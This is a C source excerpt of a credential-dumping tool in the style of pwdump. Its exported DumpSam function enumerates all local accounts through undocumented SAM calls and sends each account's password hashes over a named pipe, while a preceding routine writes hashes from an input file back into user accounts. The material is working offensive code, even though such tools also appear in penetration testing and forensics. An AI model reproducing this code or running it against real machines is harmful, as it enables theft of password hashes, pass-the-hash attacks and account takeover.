				SendText (hPipe, szBuffer);
				OutputDebugString (szBuffer);
				continue;
			}

			// initialize everything to zeros
			ZeroMemory(pwd, sizeof (pwd));
			ZeroMemory(user, sizeof (user));
			ZeroMemory(hash, sizeof (hash));
			ZeroMemory(wuser, sizeof (wuser));

			// first, copy the username out of the data
			strncpy(user, data, pos - data);
			// convert username to Unicode
			MultiByteToWideChar(CP_ACP, 0, user, -1, wuser, sizeof (wuser));
			// then, copy the password hash out
			strcpy(hash, pos + 1);

			// now, lookup the user on the local computer
			NetErr = NetUserGetInfo(NULL, wuser, 3, (LPBYTE*) &ui3);
			if (NetErr)
			{
				_snprintf (szBuffer, sizeof (szBuffer), "Unable to retrieve user information for %S : Error = %d\n", wuser, NetErr);
				SendText (hPipe, szBuffer);
				OutputDebugString (szBuffer);
				continue;
			}
			// save RID for later
			RID = ui3->usri3_user_id;
			// free memory from NetUserGetInfo call
			NetApiBufferFree(ui3);

			// now we convert the password hash back into binary; yes, there is probably a better
			// and fancier way to do this, but I wanted to be clear and safe
			HashIndex = 0;
			for (i=0; i < 32; i++)
			{
				PwdByte[0] = hash[HashIndex];
				PwdByte[1] = hash[HashIndex + 1];
				PwdByte[2] = '\0';
				intTemp = strtoul(PwdByte, &stopstring, 16); //base 16 (hex) 
				pwd[i] = intTemp;
				HashIndex = HashIndex + 2;
			}
						
			// now get the target user, based on the RID of the user
			rc = pSamrOpenUser (hDomain, MAXIMUM_ALLOWED, RID, &hUser);
			if (rc < 0)
            {
				_snprintf (szBuffer, sizeof (szBuffer), "SamrOpenUser for %S failed : 0x%08X\n", wuser, rc);
                SendText (hPipe, szBuffer);
                OutputDebugString (szBuffer);
                continue;
            }

			// and finally put the hash back into the user
			rc = pSamrSetInformationUser (hUser, SAM_USER_INFO_PASSWORD_OWFS, pwd);
			pSamrCloseHandle (&hUser);
			if (rc < 0)
			{
				_snprintf (szBuffer, sizeof (szBuffer), "SamrSetInformationUser for %S failed : 0x%08X\n", wuser, rc);
				SendText (hPipe, szBuffer);
				OutputDebugString (szBuffer);
			}
			else
			{
				// WARNING: THIS DOES NOT WORK !  In our testing, trying to set this flag
				// resulted in a reboot of the server.
				//ui3->usri3_password_expired = 0; // 1 will force a password change
				//NetErr = NetUserSetInfo(NULL, wuser, 3, (LPBYTE) &ui3, NULL);
				_snprintf (szBuffer, sizeof (szBuffer), "Set password for user %S\n", wuser);
				SendText (hPipe, szBuffer);
				OutputDebugString (szBuffer);
			}
		}	
		fclose(stream);
	}
	else
	{
		_snprintf (szBuffer, sizeof (szBuffer), "Unable to open input file %s", InputFile);
        SendText (hPipe, szBuffer);
        OutputDebugString (szBuffer);
		goto exit;
	}

	theRc = 0;

exit:
	if (hDomain)
        pSamrCloseHandle (&hDomain);
    if (hSam)
        pSamrCloseHandle (&hSam);
    if (lsaHandle)
        LsaClose (lsaHandle);
    if (hPipe)
    {
        FlushFileBuffers (hPipe);
        CloseHandle (hPipe);
    }
    if (hSamsrv)
        FreeLibrary (hSamsrv);

    return theRc;
}


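// Dump the SAM contents to a file.
//
// DumpSam writes, over the named pipe szPipeName, one DumpInfo record per
// account in the local SAM account domain.  The steps, in order:
//   1. open the client end of the pipe for writing (FILE_FLAG_WRITE_THROUGH,
//      so each line reaches the reader before the next call);
//   2. resolve the SAM entry points (LoadFunctions);
//   3. open the LSA policy and read the account-domain SID
//      (LsaQueryInformationPolicy / PolicyAccountDomainInformation);
//   4. connect to SAM, open that domain, and enumerate its users in
//      batches of up to 1000 RIDs -- SamrEnumerateUsersInDomain keeps
//      returning 0x105 (STATUS_MORE_ENTRIES) until the final batch;
//   5. for each RID, open the user, query SAM_USER_INFO_PASSWORD_OWFS and
//      hand that buffer, with the ANSI user name, to DumpInfo.
//
// szPipeName         -- name of the output pipe, passed straight to CreateFile.
// szCurrentDirectory -- accepted for interface compatibility; unused here.
// Returns 0 once the enumeration loop has finished, 1 if any step before it
// fails.  Per-user failures are reported on the pipe and skipped, not fatal.
// Every failure path goes through `exit`, which releases only what was
// acquired.  hSamsrv is a file-level module handle, presumably set by
// LoadFunctions (its definition is outside this routine).
// NOTE(review): a non-UNICODE build is assumed -- _snprintf fills the TCHAR
// szBuffer with narrow text and SendText/OutputDebugString take it as-is.
int __declspec(dllexport) DumpSam (char *szPipeName, char *szCurrentDirectory)
{
    int i;
    HANDLE hPipe = INVALID_HANDLE_VALUE;    // CreateFile fails with this, never NULL
    LSA_OBJECT_ATTRIBUTES objAttrib;
    LSA_HANDLE lsaHandle = 0;
    PLSA_UNICODE_STRING pSystemName = NULL; // NULL == local machine
    POLICY_ACCOUNT_DOMAIN_INFO* pDomainInfo = NULL; // LSA-owned; released with LsaFreeMemory
    NTSTATUS rc, enum_rc;
    TCHAR szBuffer[300];
    HSAM hSam = 0;
    HDOMAIN hDomain = 0;
    HUSER hUser = 0;
    DWORD dwEnum = 0;                       // enumeration resume cookie, updated by SAM
    DWORD dwNumRet;
    SAM_USER_ENUM *pEnum = NULL;
    PVOID pUserInfo = 0;

    int theRc = 1; // set to fail initially

    (void) szCurrentDirectory; // kept in the signature for callers; not used

    // Open the output pipe
    hPipe = CreateFile (szPipeName, GENERIC_WRITE, 0, NULL,
                        OPEN_EXISTING, FILE_FLAG_WRITE_THROUGH, NULL);
    if (hPipe == INVALID_HANDLE_VALUE)
    {
        // No pipe to report on yet, so the debugger is the only outlet.
        _snprintf (szBuffer, sizeof (szBuffer), "Failed to open output pipe(%s): %lu\n",
                   szPipeName, (unsigned long) GetLastError ());
        OutputDebugString (szBuffer);
        goto exit;
    }

    if (!LoadFunctions ())
    {
        SendText (hPipe, "Failed to load functions\n");
        goto exit;
    }

    // Open the Policy database.  Only PolicyAccountDomainInformation is queried
    // below, for which POLICY_VIEW_LOCAL_INFORMATION would suffice; the broader
    // mask is kept as the original requested it.
    memset (&objAttrib, 0, sizeof (objAttrib));
    objAttrib.Length = sizeof (objAttrib);

    rc = LsaOpenPolicy (pSystemName, &objAttrib, POLICY_ALL_ACCESS, &lsaHandle);
    if (rc < 0)
    {
        _snprintf (szBuffer, sizeof (szBuffer), "LsaOpenPolicy failed : 0x%08lX", (unsigned long) rc);
        SendText (hPipe, szBuffer);
        OutputDebugString (szBuffer);
        goto exit;
    }

    // The account-domain SID is what SamrOpenDomain needs below.
    rc = LsaQueryInformationPolicy (lsaHandle, PolicyAccountDomainInformation, &pDomainInfo);
    if (rc < 0)
    {
        _snprintf (szBuffer, sizeof (szBuffer), "LsaQueryInformationPolicy failed : 0x%08lX", (unsigned long) rc);
        SendText (hPipe, szBuffer);
        OutputDebugString (szBuffer);
        pDomainInfo = NULL; // nothing to release on this path
        goto exit;
    }

    // Connect to the SAM database
    rc = pSamIConnect (0, &hSam, MAXIMUM_ALLOWED, 1);
    if (rc < 0)
    {
        _snprintf (szBuffer, sizeof (szBuffer), "SamConnect failed : 0x%08lX", (unsigned long) rc);
        SendText (hPipe, szBuffer);
        OutputDebugString (szBuffer);
        goto exit;
    }

    // 0xf07ff is the domain access mask the original used (it matches
    // DOMAIN_ALL_ACCESS); the header that names it is not included here.
    rc = pSamrOpenDomain (hSam, 0xf07ff, pDomainInfo->DomainSid, &hDomain);
    if (rc < 0)
    {
        _snprintf (szBuffer, sizeof (szBuffer), "SamOpenDomain failed : 0x%08lX\n", (unsigned long) rc);
        SendText (hPipe, szBuffer);
        OutputDebugString (szBuffer);
        hDomain = 0; // do not trust the out-parameter after a failure
        goto exit;
    }

    // Walk the domain in batches; dwEnum carries the position between calls.
    do
    {
        enum_rc = pSamrEnumerateUsersInDomain (hDomain, &dwEnum, 0, &pEnum, 1000, &dwNumRet);
        if (enum_rc == 0 || enum_rc == 0x105) // 0x105 == STATUS_MORE_ENTRIES
        {
            for (i=0; i<(int)dwNumRet; i++)
            {
                CHAR szUserName[256];
                wchar_t wBuff[256];
                DWORD dwSize;

                // Open the user (by Rid)
                rc = pSamrOpenUser (hDomain, MAXIMUM_ALLOWED, pEnum->users[i].rid, &hUser);
                if (rc < 0)
                {
                    _snprintf (szBuffer, sizeof (szBuffer),
                               "SamrOpenUser(0x%lx) failed : 0x%08lX\n",
                               (unsigned long) pEnum->users[i].rid, (unsigned long) rc);
                    SendText (hPipe, szBuffer);
                    OutputDebugString (szBuffer);
                    continue;
                }

                // Get the password OWFs
                rc = pSamrQueryInformationUser (hUser, SAM_USER_INFO_PASSWORD_OWFS, &pUserInfo);
                if (rc < 0)
                {
                    _snprintf (szBuffer, sizeof (szBuffer), "SamrQueryInformationUser failed : 0x%08lX\n", (unsigned long) rc);
                    SendText (hPipe, szBuffer);
                    OutputDebugString (szBuffer);
                    pSamrCloseHandle (&hUser);
                    hUser = 0;
                    continue;
                }

                // Convert the username.  name.Length is a byte count of a
                // counted (not NUL-terminated) UNICODE_STRING, hence /2 and the
                // explicit terminator after the bounded copy.
                dwSize = min ((sizeof (wBuff)/sizeof(wchar_t))-1, pEnum->users[i].name.Length/2);
                wcsncpy (wBuff, pEnum->users[i].name.Buffer, dwSize);
                wBuff[dwSize] = L'\0';
                if (WideCharToMultiByte (CP_ACP, 0, wBuff, -1, szUserName, sizeof (szUserName), 0, 0) == 0)
                    szUserName[0] = '\0'; // conversion failed: emit an empty name, not stack garbage
                szUserName[sizeof (szUserName) -1] = '\0';
                DumpInfo (hPipe, szUserName, pUserInfo);

                // Free stuff
                pSamIFree_SAMPR_USER_INFO_BUFFER (pUserInfo, SAM_USER_INFO_PASSWORD_OWFS);
                pUserInfo = 0;
                pSamrCloseHandle (&hUser);
                hUser = 0;

            }
            pSamIFree_SAMPR_ENUMERATION_BUFFER (pEnum);
            pEnum = NULL;
        }
        else
        {
            // Any other status ends the loop below (enum_rc != 0x105).
            _snprintf (szBuffer, sizeof (szBuffer), "SamrEnumerateUsersInDomain failed : 0x%08lX\n", (unsigned long) enum_rc);
            SendText (hPipe, szBuffer);
            OutputDebugString (szBuffer);
        }
    }
    while (enum_rc == 0x105);

    theRc = 0;

exit:
    // Clean up, in reverse order of acquisition.
    if (hUser)
        pSamrCloseHandle (&hUser);
    if (hDomain)
        pSamrCloseHandle (&hDomain);
    if (hSam)
        pSamrCloseHandle (&hSam);
    if (pDomainInfo)
        LsaFreeMemory (pDomainInfo); // buffer returned by LsaQueryInformationPolicy
    if (lsaHandle)
        LsaClose (lsaHandle);
    // INVALID_HANDLE_VALUE is non-zero, so a plain `if (hPipe)` would flush and
    // close the failure sentinel when CreateFile failed.
    if (hPipe != INVALID_HANDLE_VALUE)
    {
        FlushFileBuffers (hPipe);
        CloseHandle (hPipe);
    }
    if (hSamsrv)
        FreeLibrary (hSamsrv);

    return theRc;
}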
